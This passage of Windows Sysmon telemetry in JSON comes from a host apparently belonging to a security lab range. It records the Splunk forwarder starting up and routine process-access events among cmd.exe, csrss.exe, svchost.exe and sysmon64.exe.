C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-0010291F0500}\r\nParentProcessId: 2756\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.338","ProcessGuid":"{A837DB8D-0239-5F25-0000-0010E51F0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-0010291F0500}","ParentProcessId":"2756","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3138,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-0010291F0500}\r\nSourceProcessId: 2756\r\nSourceThreadId: 2744\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010E51F0500}\r\nTargetProcessId: 2528\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-0010291F0500}","SourceProcessId":"2756","SourceThreadId":"2744","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010E51F0500}","TargetProcessId":"2528","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3139,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010E51F0500}\r\nTargetProcessId: 2528\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010E51F0500}","TargetProcessId":"2528","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3140,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3141,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3142,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3143,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3144,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3145,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
